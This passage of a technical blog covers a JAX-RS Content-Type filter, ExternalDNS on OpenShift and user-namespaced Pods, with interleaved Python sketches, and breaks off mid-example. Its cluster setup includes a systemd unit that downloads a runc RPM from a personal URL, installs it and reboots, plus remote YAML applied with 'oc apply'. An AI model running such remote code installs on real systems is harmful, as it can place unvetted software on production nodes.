that avoids these disadvantages.
Idea 2: response filter §
My next idea was to use a response filter to reformat the
Content-Type response header. The JAX-RS API defines the
ContainerResponseFilter interface:
public interface ContainerResponseFilter {
  void filter(
      ContainerRequestContext requestContext,
      ContainerResponseContext responseContext)
    throws IOException;
}
The application applies each registered filter to each response,
before serialising and sending the response. At the time response
filters are applied, the Content-Type header value is a
MediaType. It has not yet been converted to a String.
A response filter can add, remove, or replace response headers.
Recall that headers are stored in a MultivaluedMap<String, Object>. This means that we can replace a MediaType value (whose
serialisation is determined by the HeaderDelegate) with a String
value (which will be written as is).
The .equals equality test for MediaType properly compares the
properties of the instance without regard to string representation.
As it should. This enables a succinct implementation where we:

Declare verbatim String header values we want to see in the
response.
Parse those strings into MediaType values.
Match the Content-Type value in the response against parsed
values.
Replace matched header values with the corresponding verbatim
String.

The implementation is straightforward:
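// Imports assume the javax.ws.rs namespace (jakarta.ws.rs in newer stacks).
import java.util.HashMap;
import javax.ws.rs.container.ContainerRequestContext;
import javax.ws.rs.container.ContainerResponseContext;
import javax.ws.rs.container.ContainerResponseFilter;
import javax.ws.rs.core.HttpHeaders;
import javax.ws.rs.core.MediaType;
import javax.ws.rs.core.MultivaluedMap;
import javax.ws.rs.ext.Provider;

@Provider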
public class ReformatContentTypeResponseFilter
    implements ContainerResponseFilter {

  private static String[] verbatim = {
    "application/pkcs7-mime; smime-type=certs-only"
  };

  private static HashMap<MediaType, String> substitutions =
    new HashMap<>();

  static {
    for (String s : verbatim)
      substitutions.put(MediaType.valueOf(s), s);
  }

  @Override
  public void filter(
      ContainerRequestContext requestContext,
      ContainerResponseContext responseContext) {
    MultivaluedMap<String, Object> headers =
      responseContext.getHeaders();
    Object v = headers.getFirst(HttpHeaders.CONTENT_TYPE);
    if (v != null && v instanceof MediaType
        && substitutions.containsKey(v)) {
      headers.putSingle(
        HttpHeaders.CONTENT_TYPE, substitutions.get(v));
    }
  }

}
There is currently only one header value whose formatting I need to
precisely control. If we discover more, we only need to add the
desired string serialisation to the verbatim array.
We must consider the possible scenario of different clients with
different quirks. In that case, we could maintain separate
substitutions maps for each known problematic client. We would use
the User-Agent header, or other request characteristics, to
identify the client and select the corresponding substitution map
(if any). Hopefully this situation does not arise. But if it does,
the increase in complexity of the solution is tolerable.
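To make the per-client idea concrete, here is a minimal sketch in Python rather than Java. It is only an illustration of the selection logic, not code from the actual filter. The client marker "QuirkyClient/1" and the helper names are hypothetical, and the media type parsing is deliberately simplistic.

```python
from typing import Optional


def parse_media_type(value: str) -> tuple:
    """Normalise a media type so that spacing and case do not affect equality."""
    main, *params = [part.strip() for part in value.split(";")]
    pairs = []
    for param in params:
        if not param:
            continue
        key, _, val = param.partition("=")
        pairs.append((key.strip().lower(), val.strip().strip('"')))
    return (main.lower(), frozenset(pairs))


# Hypothetical: one list of verbatim header values per problematic client,
# keyed by a substring expected in that client's User-Agent header.
VERBATIM_BY_CLIENT = {
    "QuirkyClient/1": ["application/pkcs7-mime; smime-type=certs-only"],
}

# Parsed media type -> verbatim string, one table per client marker.
SUBSTITUTIONS = {
    marker: {parse_media_type(s): s for s in values}
    for marker, values in VERBATIM_BY_CLIENT.items()
}


def reformat_content_type(user_agent: Optional[str], content_type: str) -> str:
    """Return the verbatim string for a known client, else the value unchanged."""
    for marker, table in SUBSTITUTIONS.items():
        if user_agent and marker in user_agent:
            return table.get(parse_media_type(content_type), content_type)
    return content_type
```

Clients that match no marker get the default serialisation, so the workaround stays confined to the clients that need it.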
This solution works well and avoids the disadvantages of my first
idea:

Only uses official Servlet and JAX-RS classes and interfaces.
This solution will work across all JAX-RS implementations.
Does not (re)implement MediaType serialisation. You just declare
the exact string values you want to see in responses.
With a moderate increase in complexity, can handle different
clients with incompatible quirks.

Conclusion §
It’s unfortunate that this workaround was even necessary. But given
that it was, I’m happy with the solution. It is simple and portable
across Servlet and JAX-RS implementations.
The same approach could be used for controlling formatting of any
header value types, not just Content-Type / MediaType. I hope
that sharing this solution will help people who encounter similar
problems. At the very least, I hope that because of this post you
learned something about Servlet and JAX-RS response header
processing.


Experimenting with ExternalDNS
2022-03-24T00:00:00Z
DNS is a critical piece of the puzzle for exposing Kubernetes-hosted
applications to the Internet. Running the application means nothing
if you can’t get traffic to it. Keeping public DNS records in sync
with the deployed applications is important. The Kubernetes
ExternalDNS project was developed for this purpose.
ExternalDNS exposes Kubernetes Services and Routes by managing
records in external DNS providers. It supports many DNS
providers, including the DNS services of the popular
cloud providers (AWS, Google Cloud, Azure, …).
I have been experimenting with ExternalDNS. My purpose is not only
to understand installation and basic usage, but also whether it can
meet the specific DNS requirements of FreeIPA, such as SRV
records. This post outlines my findings.
Operator installation §
The ExternalDNS controller is a Kubernetes sub-project (or
SIG—special interest group). In the OpenShift ecosystem, the
ExternalDNS Operator creates and manages ExternalDNS controller
instances defined by custom resources (CRs) of kind: ExternalDNS.
The ExternalDNS Operator is available as a Tech Preview in
OpenShift Container Platform 4.10. So, it is visible in the
OperatorHub catalogue out-of-the-box. The official docs
explain how to install the operator via the OperatorHub web console.
The instructions were easy to follow.
I prefer using the CLI where possible. The OperatorHub system is
complex but I eventually worked out what commands and objects are
needed to install the ExternalDNS Operator from the CLI.
First, create the operand namespace and RBAC objects. The
operand namespace is where the ExternalDNS controllers (as opposed
to the ExternalDNS Operator controller) will live.
% oc create ns external-dns
namespace/external-dns created

% oc apply -f \
    https://raw.githubusercontent.com/openshift/external-dns-operator/release-0.1/config/rbac/extra-roles.yaml
role.rbac.authorization.k8s.io/external-dns-operator created
rolebinding.rbac.authorization.k8s.io/external-dns-operator created
clusterrole.rbac.authorization.k8s.io/external-dns created
clusterrolebinding.rbac.authorization.k8s.io/external-dns created
Next, create the external-dns-operator namespace where the
operator itself shall live:
% oc create ns external-dns-operator
namespace/external-dns-operator created
Finally, create the OperatorGroup and OperatorHub Subscription
objects. Note the contents of external-dns-operator.yaml:
apiVersion: operators.coreos.com/v1
kind: OperatorGroup
metadata:
  generateName: external-dns-operator-
  namespace: external-dns-operator
spec:
  targetNamespaces:
  - external-dns-operator
---
apiVersion: operators.coreos.com/v1alpha1
kind: Subscription
metadata:
  name: external-dns-operator
  namespace: external-dns-operator
spec:
  name: external-dns-operator
  source: redhat-operators
  sourceNamespace: openshift-marketplace
Create the objects:
% oc create -f external-dns-operator.yaml
operatorgroup.operators.coreos.com/external-dns-operator-8852w created
subscription.operators.coreos.com/external-dns-operator created
After a short delay (~1 minute for me) the operator installation
should finish. Observe the various Kubernetes objects that
represent the running operator:
% oc get -n external-dns-operator all
NAME                                         READY   STATUS    RESTARTS      AGE
pod/external-dns-operator-594b465984-r2pc5   2/2     Running   2 (59s ago)   5m13s

NAME                                            TYPE        CLUSTER-IP       EXTERNAL-IP   PORT(S)    AGE
service/external-dns-operator-metrics-service   ClusterIP   172.30.151.142   <none>        8443/TCP   5m15s
service/external-dns-operator-service           ClusterIP   172.30.210.21    <none>        9443/TCP   59s

NAME                                    READY   UP-TO-DATE   AVAILABLE   AGE
deployment.apps/external-dns-operator   1/1     1            1           5m14s

NAME                                               DESIRED   CURRENT   READY   AGE
replicaset.apps/external-dns-operator-594b465984   1         1         1       5m15s
The ExternalDNS custom resource §
Now that the operator is installed, we can define an ExternalDNS
custom resource (CR). The operator creates an ExternalDNS
controller instance for each CR. Here is an example
(externaldns-test.yaml):
apiVersion: externaldns.olm.openshift.io/v1alpha1
kind: ExternalDNS
metadata:
  name: test
spec:
  domains:
    - filterType: Include 
      matchType: Exact 
      name: ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com
  provider:
    type: GCP
  source:
    type: Service
    service:
      serviceType:
        - LoadBalancer
    labelFilter:
      matchLabels:
        app: echo
    fqdnTemplate:
      - "{{.Name}}.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com"
Breaking down the spec, we see the following fields:

domains gives a rule for which domains this ExternalDNS
controller must manage. In this case, any domain name with a
suffix matching the name subfield will match the rule.
provider specifies the cloud provider—in this case GCP
(Google Cloud). For GCP there is nothing else to configure; the
controller will use the main cluster secret to authenticate to
Google Cloud.
source specifies which kinds of objects the controller will
monitor to determine the DNS records to be created/managed. We
configure the controller to watch Service objects. Further
configuration is specified in subfields:

serviceType restricts the type(s) of Service objects to be
considered.
labelFilter can be set to further restrict the set of
source objects by matching on the label field. In this
example, we only match Service objects with label app: echo.
fqdnTemplate specifies how to derive the fully qualified
DNS name from the Service object.
hostnameAnnotation can be set to Allow to allow the FQDN
to be specified via the
external-dns.alpha.kubernetes.io/hostname annotation on the
Service object. The default value is Ignore, in which case
fqdnTemplate is required.
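To illustrate how the fqdnTemplate and domains fields interact, here is a rough Python sketch. It is not how the controller is implemented: the real controller evaluates a Go template, whereas this sketch only substitutes the {{.Name}} placeholder, and the suffix check merely mirrors the behaviour described above. The function names are my own.

```python
def render_fqdn(template: str, service_name: str) -> str:
    """Substitute the Service name into a template such as '{{.Name}}.example.net'."""
    return template.replace("{{.Name}}", service_name)


def in_domain(fqdn: str, domain: str) -> bool:
    """True if fqdn equals the domain or is a name underneath it."""
    fqdn = fqdn.rstrip(".").lower()
    domain = domain.rstrip(".").lower()
    return fqdn == domain or fqdn.endswith("." + domain)


DOMAIN = "ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com"
TEMPLATE = "{{.Name}}." + DOMAIN

# A Service named echo-tcp yields a name inside the managed domain.
fqdn = render_fqdn(TEMPLATE, "echo-tcp")
managed = in_domain(fqdn, DOMAIN)
```

With the CR above, a Service named echo-tcp would be given the name echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com, which falls under the configured domain.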


Aside from type: Service, the ExternalDNS CR also recognises
type: OpenShiftRoute. This type uses Route objects as the
source, creating CNAME records to alias the FQDN derived from the
Route object to the canonical DNS name of the ingress controller.
This isn’t the behaviour I’m looking for, so the rest of this
article focuses on the behaviour for Service sources.
Creating the ExternalDNS controller §
Now that we have defined an ExternalDNS custom resource, let’s
create it and see what happens. I would like to watch the logs of
the ExternalDNS Operator during this operation.
Earlier we saw that the name of the operator Pod is
pod/external-dns-operator-594b465984-r2pc5. This Pod has two
containers:
% oc get -o json -n external-dns-operator \
    pod/external-dns-operator-594b465984-r2pc5 \
    | jq '.status.containerStatuses[].name'
"kube-rbac-proxy"
"operator"
The container named operator is the one we are interested in.
We can watch its log output like so:
% oc logs -n external-dns-operator --tail 2 --follow \
    external-dns-operator-594b465984-r2pc5 operator
2022-03-22T04:41:06.625Z        INFO    controller-runtime.manager.controller.external_dns_controller   Starting workers        {"worker count": 1}
2022-03-22T04:41:06.626Z        INFO    controller-runtime.manager.controller.credentials_secret_controller     Starting workers        {"worker count": 1}
... (waiting for more output)
Now, in another terminal, create the ExternalDNS CR object:
% oc create -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test created
Log output shows the ExternalDNS Operator responding to the
appearance of the externaldns/test CR:
controller-runtime.webhook.webhooks     received request        {"webhook": "/validate-externaldns-olm-openshift-io-v1alpha1-externaldns", "UID": "cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc", "kind": "externaldns.olm.openshift.io/v1alpha1, Kind=ExternalDNS", "resource": {"group":"externaldns.olm.openshift.io","version":"v1alpha1","resource":"externaldnses"}}
validating-webhook      validate create {"name": "test"}
controller-runtime.webhook.webhooks     wrote response  {"webhook": "/validate-externaldns-olm-openshift-io-v1alpha1-externaldns", "code": 200, "reason": "", "UID": "cf2fb876-9ddd-45a8-88b8-5cc0344fb5cc", "allowed": true}
external_dns_controller reconciling externalDNS {"externaldns": "/test"}
…
And if we look in the operand namespace (external-dns) we see
a Pod running:
% oc get -n external-dns pod
NAME                                 READY   STATUS    RESTARTS   AGE
external-dns-test-865ffff756-45d44   1/1     Running   0          54s
And if you want to see what an ExternalDNS controller is up to,
you can watch its logs:
% oc logs -n external-dns --tail 1 --follow \
    pod/external-dns-test-865ffff756-45d44
time="2022-03-23T12:26:18Z" level=info msg="All records are already up to date"
... (waiting for more output)
Observing record creation §
After creating the ExternalDNS instance, I found the Google Cloud DNS
zone for my cluster and queried its records. How to interact with
the cloud provider depends on which cloud provider the cluster is
hosted on, so I won’t provide details. The existing records are:
ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  NS    21600  ns-gcp-private.googledomains.com.
ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  SOA   21600  ns-gcp-private.googledomains.com.
api.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
api-int.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     60     10.0.0.2
*.apps.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     30     35.223.148.37

This is a private zone specific to my cluster. Some non-routable
addresses appear. I haven’t figured out how to update the records
in the public zone yet. I’m confident this is not a problem with
ExternalDNS. Rather, I put it down to my lack of familiarity with
how to configure it, and with Google Cloud DNS.

We can see that in addition to the expected NS and SOA records,
there are A records for the API server and a wildcard A record
for the main ingress controller.
Next I create the following Service:
apiVersion: v1
kind: Service
metadata:
  name: echo-tcp
  labels:
    app: echo
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: tcpecho
    protocol: TCP
    port: 12345
Note that it has the app: echo label and has type: LoadBalancer,
satisfying the match criteria of the externaldns/test controller.
Create the service and observe its public IP address:
% oc create -f service-echo.yaml
service/echo-tcp created

% oc get service/echo-tcp \
    -o jsonpath='{.status.loadBalancer}'
{"ingress":[{"ip":"35.188.22.139"}]}
After creating the Service, two new records appeared in the zone:
echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  A     300    35.188.22.139
external-dns-echo-tcp.ci-ln-053y10k-72292.origin-ci-int-gce.dev.rhcloud.com.
  TXT   300    "heritage=external-dns,external-dns/owner=external-dns-test,external-dns/resource=service/test/echo-tcp"
The A record resolves the DNS name to the load balancer’s IP
address. Nothing surprising here.
The TXT record is for the name external-dns-echo-tcp.… and
contains some metadata about the “owner” of the corresponding A
record. Specifically, it identifies the Service object that is the
source of the record. I am not 100% sure, but it seems to also
contain information about the ExternalDNS controller that created
the record.
When I first saw the TXT records, I theorised that the ExternalDNS
controller uses the TXT records to find “obsolete” records and
delete them. This would occur, for example, when the Service is
deleted. Indeed, deleting service/echo-tcp resulted in the
removal of both the A and TXT records.
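The ownership metadata is easy to pick apart. The following Python sketch parses the TXT value shown above and checks which controller claims the record. It assumes the comma-separated key=value layout I observed. The function names are mine, and this is a guess at the idea, not the controller's actual logic.

```python
def parse_registry_txt(value: str) -> dict:
    """Split 'k1=v1,k2=v2,...' (optionally quoted) into a dict."""
    fields = {}
    for item in value.strip('"').split(","):
        key, sep, val = item.partition("=")
        if sep:
            fields[key] = val
    return fields


def owned_by(value: str, owner_id: str) -> bool:
    """True if the TXT value marks the record as managed by the given owner."""
    fields = parse_registry_txt(value)
    return (fields.get("heritage") == "external-dns"
            and fields.get("external-dns/owner") == owner_id)


TXT = ('"heritage=external-dns,external-dns/owner=external-dns-test,'
       'external-dns/resource=service/test/echo-tcp"')
fields = parse_registry_txt(TXT)
```

A controller following this scheme would only delete records whose TXT companion names it as the owner and leave everything else in the zone alone.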
SRV records for LoadBalancer Services §
Kubernetes’ internal DNS system follows a DNS-based service
discovery specification. In addition to A/AAAA
records, SRV records are created to locate service endpoints (port
and target DNS name) based on service name and transport protocol
(TCP or UDP). SRV records are an important part of several
protocols as used in the real world, including Kerberos, SIP, LDAP
and XMPP. SRV records have the following shape:
_<service>._<proto>.<name> <ttl>
    <class> SRV <priority> <weight> <port> <target>
A record to locate an organisation’s LDAP server might look like:
_ldap._tcp.example.net 300
    IN SRV 10 5 389 ldap.corp.example.net
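As a small illustration of the record layout, this Python sketch splits an SRV record in the presentation format used by the LDAP example into named fields. The class and function names are my own, and the parser handles only this simple whitespace-separated form.

```python
from typing import NamedTuple


class SrvRecord(NamedTuple):
    service: str
    proto: str
    name: str
    ttl: int
    priority: int
    weight: int
    port: int
    target: str


def parse_srv(text: str) -> SrvRecord:
    """Parse '_svc._proto.name TTL IN SRV priority weight port target'."""
    owner, ttl, rr_class, rr_type, priority, weight, port, target = text.split()
    if rr_class != "IN" or rr_type != "SRV":
        raise ValueError("not an IN SRV record")
    service, proto, name = owner.split(".", 2)
    if not (service.startswith("_") and proto.startswith("_")):
        raise ValueError("owner name must start with _service._proto")
    return SrvRecord(service[1:], proto[1:], name, int(ttl),
                     int(priority), int(weight), int(port), target)


record = parse_srv("""_ldap._tcp.example.net 300
    IN SRV 10 5 389 ldap.corp.example.net""")
```

A client looking for LDAP over TCP in example.net would connect to record.target on record.port, preferring records with a lower priority value.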
Although the current system has a critical deficiency for
applications that use SRV records and operate on both TCP and UDP
(see my previous blog post),
for most applications it works well. Unfortunately, ExternalDNS
does not follow the DNS spec and does not create SRV records for
Services.
I am not sure why this is the case. Perhaps ExternalDNS even
pre-dates the SRV aspects of the Kubernetes DNS specification. Or
the need might not have been recognised or deemed sufficiently
critical to address this gap.
As it happens, there is an abandoned pull request from two years
ago that sought to add SRV record generation to ExternalDNS and
bring it in line with the spec. The maintainers seemed receptive,
but the PR author no longer needed the feature and closed it. So I
think there is reason to hope that the feature might eventually make
it into ExternalDNS. Perhaps our team will drive it… we need SRV
records, and it would probably be better to enhance ExternalDNS than
to build our own solution from scratch.
SRV records for NodePort services §
I said that ExternalDNS does not support SRV records, but there is
one exception to that. ExternalDNS does create SRV records for
Services of type: NodePort. This is not an appropriate solution
for our application, but we can still play with it and get a feel
for how it might work similarly for LoadBalancer Services.
First, we have to modify externaldns/test to add NodePort to the
list of Service types. Update externaldns-test.yaml:
…
    service:
      serviceType:
        - LoadBalancer
        - NodePort
…
And apply updated configuration:
% oc replace -f externaldns-test.yaml
externaldns.externaldns.olm.openshift.io/test replaced
Now create a new NodePort Service. service-nodeport.yaml:
apiVersion: v1
kind: Service
metadata:
  name: nodeport
  labels:
    app: echo
spec:
  type: NodePort
  selector:
    app: echo
  ports:
  - name: nodeport
    protocol: TCP
    port: 12345
% oc create -f service-nodeport.yaml
service/nodeport created
The ExternalDNS controller log output shows it generating an SRV
record for the Service (wrapped for clarity):
…
time="…" level=debug msg="Endpoints generated from service:
default/nodeport:
[ _nodeport._tcp.nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN SRV  0 50 30632
    nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com []
  nodeport.ci-ln-8hkfrzk-72292.origin-ci-int-gce.dev.rhcloud.com 0
    IN A  10.0.0.4;10.0.0.5;10.0.128.3;10.0.128.2;10.0.128.4;10.0.0.3 []
]"
…
Unfortunately, the SRV record didn’t actually make it to the
Google Cloud DNS zone. I haven’t worked out why, yet. The A
record does get created; it’s only the SRV record that is missing.
I’ll update this article if/when I work out why the SRV record
goes missing.
Conclusion §
The ExternalDNS system is intended to automatically manage public
DNS records for Kubernetes-hosted applications. It can
automatically create CNAME records for OpenShift Routes and
A/AAAA records for Services, including LoadBalancer services.
For applications that use A/AAAA and CNAME records, it works
well.
Unfortunately, SRV records are not well supported. Certainly, it
does not meet the needs of typical applications that use SRV
records. Operators of such applications currently have one of two
options: either manage the records manually (do not want), or
implement the required automation yourselves (e.g. in the
application’s operator program).
The best way forward is to implement better support for SRV
records in ExternalDNS itself, so everyone can benefit through
shared effort and maintainership vested in the Kubernetes SIG. I
shall file a ticket and perhaps restart discussions in the
abandoned pull request with a view to getting this
critical feature on the ExternalDNS roadmap. The extent of
involvement of myself or my team in implementing or driving this
feature work will be determined later.


Running Pods in user namespaces without privileged SCCs
2022-02-02T00:00:00Z
In previous posts I demonstrated how to run workloads in an
isolated user namespace on OpenShift. There are still some caveats
to doing this. One of these relates to Security Context
Constraints (SCCs), a security policy mechanism in OpenShift. In
particular, it appeared necessary to admit the Pod via the anyuid
SCC, or one with similar high privileges. This meant that although
the workload itself runs under unprivileged UIDs, the account that
creates the Pod would need privileges to create Pods that run under
arbitrary host UIDs. This is not a desirable situation.
I have investigated that matter further, and it turns out that you
can run a workload in a user namespace even via the default
restricted SCC. But the configuration is not intuitive, and the
reasons why it must be configured that way are convoluted. In
this post I explain the challenges that arise when running a user
namespaced Pod under the restricted SCC, and demonstrate the
solution.

This post assumes a basic knowledge of Security Context Constraints.
If you are unfamiliar with SCCs, the DevConf.cz 2022 presentation
Introduction to Security Context Constraints (slides,
video) by Alberto Losada and Mario Vázquez will bring you up to
speed.

Cluster configuration §
I am testing on an OpenShift 4.10 (pre-release) cluster. Some
changes to worker node configuration are required. The following
MachineConfig object defines those changes:
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: worker
  name: idm-4-10
spec:
  kernelArguments:
    - systemd.unified_cgroup_hierarchy=1
    - cgroup_no_v1="all"
    - psi=1
  config:
    ignition:
      version: 3.1.0
    systemd:
      units:
      - name: "override-runc.service"
        enabled: true
        contents: |
          [Unit]
          Description=Install runc override
          After=network-online.target rpm-ostreed.service
          [Service]
          ExecStart=/bin/sh -c 'rpm -q runc-1.0.3-992.rhaos4.10.el8.x86_64 || rpm-ostree override replace --reboot https://ftweedal.fedorapeople.org/runc-1.0.3-992.rhaos4.10.el8.x86_64.rpm'
          Restart=on-failure
          [Install]
          WantedBy=multi-user.target
    storage:
      files:
      - path: /etc/subuid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
      - path: /etc/subgid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
      - path: /etc/crio/crio.conf.d/99-crio-userns.conf
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS53b3JrbG9hZHMub3BlbnNoaWZ0LXVzZXJuc10KYWN0aXZhdGlvbl9hbm5vdGF0aW9uID0gImlvLm9wZW5zaGlmdC51c2VybnMiCmFsbG93ZWRfYW5ub3RhdGlvbnMgPSBbCiAgImlvLmt1YmVybmV0ZXMuY3JpLW8udXNlcm5zLW1vZGUiLAogICJpby5rdWJlcm5ldGVzLmNyaS1vLmNncm91cDItbW91bnQtaGllcmFyY2h5LXJ3IiwKICAiaW8ua3ViZXJuZXRlcy5jcmktby5EZXZpY2VzIgpdCg==
The main parts of this MachineConfig are:

The kernelArguments enable cgroupsv2, which are not strictly
required for this demo, but are required for running systemd-based
workloads.
The override-runc.service systemd unit installs a custom
version of runc that implements the new OCI Runtime Specification
cgroup ownership semantics.
This should be the default behaviour in future versions of
OpenShift, perhaps as soon as OpenShift 4.11.
/etc/subuid and /etc/subgid provide a sub-id mapping range
for CRI-O to use when creating Pods with user namespaces.
/etc/crio/crio.conf.d/99-crio-userns.conf defines the
io.openshift.userns workload type for CRI-O. It is also not
strictly necessary for this demo but is required for systemd-based
workloads to run successfully. The default CRI-O configuration in
OpenShift 4.10 provides the io.openshift.builder workload type,
which is sufficient if your workload does not need to manage
cgroups.
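The file contents in the MachineConfig are base64-encoded data URLs, which makes them hard to review by eye. Here is a short Python sketch for decoding them. The function name is my own, and it handles only the simple forms of data URL used here.

```python
import base64
from urllib.parse import unquote


def decode_data_url(url: str) -> str:
    """Return the text payload of a 'data:' URL (base64 or percent-encoded)."""
    header, _, payload = url.partition(",")
    if not header.startswith("data:"):
        raise ValueError("not a data URL")
    if header.endswith(";base64"):
        return base64.b64decode(payload).decode("utf-8")
    return unquote(payload)


# The source value used for /etc/subuid and /etc/subgid above.
SUBID_SOURCE = (
    "data:text/plain;charset=utf-8;base64,"
    "Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg=="
)
subid_text = decode_data_url(SUBID_SOURCE)
# subid_text is:
#   core:100000:65536
#   containers:200000:268435456
```

The same function can be applied to the 99-crio-userns.conf source value to inspect the CRI-O workload definition.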

Aside from the node configuration changes, I (as cluster admin) also
created a project and user account to use for the subsequent steps:
% oc new-project test
Now using project "test" on server "https://api.ci-ln-5rkyxfb-72292.origin-ci-int-gce.dev.rhcloud.com:6443".
…

% oc create user test
user.user.openshift.io/test created

% oc adm policy add-role-to-user edit test
clusterrole.rbac.authorization.k8s.io/edit added: "test"
I did not assign any special SCCs to the test user account.

Remember to wait for the Machine Config Operator to finish updating
the worker nodes before proceeding with Pod creation. You can use
oc wait to await this condition:
% oc wait mcp/worker \
    --for condition=updated --timeout=-1s

Problem demonstration §
The objective is to run a Pod in a user namespace, with that Pod
being admitted via the default restricted SCC. We will start with
the following Pod definition:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
  annotations:
    io.openshift.userns: "true"
    io.kubernetes.cri-o.userns-mode: "auto:size=65536"
spec:
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:35-x86_64
    command: ["sleep", "3600"]
The io.openshift.userns annotation selects the CRI-O workload
profile that we added via the MachineConfig above. This profile
enables several other annotations, but does not automatically
execute the Pod in a user namespace. For that, you must also
supply the io.kubernetes.cri-o.userns-mode annotation. Its
argument tells CRI-O to automatically select a unique host UID range
of size 65536 to map into the container’s user namespace.
I created the Pod as user test:
% oc --as test create -f pod-fedora.yaml
pod/fedora created
Observe that it was admitted via the restricted SCC:
% oc get -o json pod/fedora \
    | jq '.metadata.annotations."openshift.io/scc"'
"restricted"
Unfortunately, the container is not running:
% oc get -o json pod/fedora \
  | jq '.status.containerStatuses[].state'
{
  "waiting": {
    "message": "container create failed: time=\"2022-02-02T05:43:34Z\" level=error msg=\"container_linux.go:380: starting container process caused: setup user: cannot set uid to unmapped user in user namespace\"\n",
    "reason": "CreateContainerError"
  }
}
The core error message is: cannot set uid to unmapped user in
user namespace. This arises because, in the absence of a
runAsUser specification in the PodSpec, the restricted SCC has
defaulted it to a value from the UID range assigned to the project:
% oc get -o json pod/fedora \
  | jq '.spec.containers[].securityContext.runAsUser'
1000650000
The project UID range allocation is recorded in the project and
namespace annotations:
% oc get -o json project/test namespace/test \
    | jq '.items[].metadata.annotations."openshift.io/sa.scc.uid-range"'
"1000650000/10000"
"1000650000/10000"
OpenShift allocated to project test a range of 10000 UIDs starting
at 1000650000. The error arises because UID 1000650000 is not
mapped in the user namespace. The host UID range may be something
like 200000–265535, whereas the sandbox’s UID range is
0–65535.
I deleted the Pod and will try something different:
% oc delete pod/fedora
pod "fedora" deleted
Let’s say that we want to run the container process as UID 0 in
the Pod’s user namespace, as would be required for a systemd-based
workload. Instead of leaving it to the SCC machinery, I’ll set
runAsUser: 0 in the PodSpec myself:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
  annotations:
    io.openshift.userns: "true"
    io.kubernetes.cri-o.userns-mode: "auto:size=65536"
spec:
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:35-x86_64
    command: ["sleep", "3600"]
    securityContext:
      runAsUser: 0
This time the test user cannot even create the Pod:
% oc --as test create -f pod-fedora.yaml
Error from server (Forbidden): error when creating "pod-fedora.yaml"…
I’ve trimmed the rather long error message, but the core problem is:
spec.containers[0].securityContext.runAsUser: Invalid value:
0: must be in the ranges: [1000650000, 1000659999]
The restricted SCC only allows runAsUser values that fall in the
project’s assigned UID range. And this is what we would expect. The
problem is that the admission machinery has no awareness of user
namespaces. It cannot discern that runAsUser: 0 means that we
want to run as UID 0 inside the user namespace, whilst mapped to
an unprivileged UID on the host.
The problem is twofold. First, we are unable to control the UID
mapping that CRI-O gives us, so that it would coincide with the
project’s UID range. Second, the SCC admission checks and
defaulting are oblivious to user namespaces. runAsUser is
interpreted as referring to host UIDs, and the restricted SCC
restricts (or defaults) us to values that are not mapped in the
Pod’s user namespace.
Solution §
The map-to-root option in the userns-mode annotation provides a
solution to this dilemma. It takes whatever value runAsUser is,
and ensures that that host UID gets mapped to UID 0 in the Pod
user namespace. The updated PodSpec is:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
  annotations:
    io.openshift.userns: "true"
    io.kubernetes.cri-o.userns-mode:
      "auto:size=65536;map-to-root=true"
spec:
  securityContext:
    runAsUser: 1000650000
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:35-x86_64
    command: ["sleep", "3600"]
Now the Pod is able to run:
% oc --as test create -f pod-fedora.yaml
pod/fedora created

% oc get -o json pod/fedora \
  | jq '.spec.nodeName, .status.containerStatuses[].state'
"ci-ln-fizz88k-72292-9phfc-worker-c-7s99v"
{
  "running": {
    "startedAt": "2022-02-02T06:20:49Z"
  }
}
We can observe the UID mapping:
% oc rsh pod/fedora cat /proc/self/uid_map
         1     265536      65535
         0 1000650000          1
This shows that UID 0 in the Pod’s user namespace maps to UID
1000650000 in the parent (host) user namespace. The remaining
UIDs 1–65535 in the Pod’s user namespace are mapped contiguously
from UID 265536 in the host user namespace.
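To make the mapping concrete, this Python sketch parses the uid_map output above and translates UIDs inside the Pod to host UIDs. Each line is read as "first UID inside, first UID outside, length". The function names are my own.

```python
from typing import List, Optional, Tuple


def parse_uid_map(text: str) -> List[Tuple[int, int, int]]:
    """Parse /proc/<pid>/uid_map lines into (inside, outside, length) tuples."""
    entries = []
    for line in text.splitlines():
        if line.strip():
            inside, outside, length = (int(field) for field in line.split())
            entries.append((inside, outside, length))
    return entries


def to_host_uid(entries: List[Tuple[int, int, int]], uid: int) -> Optional[int]:
    """Translate a UID in the namespace to the host UID, or None if unmapped."""
    for inside, outside, length in entries:
        if inside <= uid < inside + length:
            return outside + (uid - inside)
    return None


UID_MAP = """\
         1     265536      65535
         0 1000650000          1
"""
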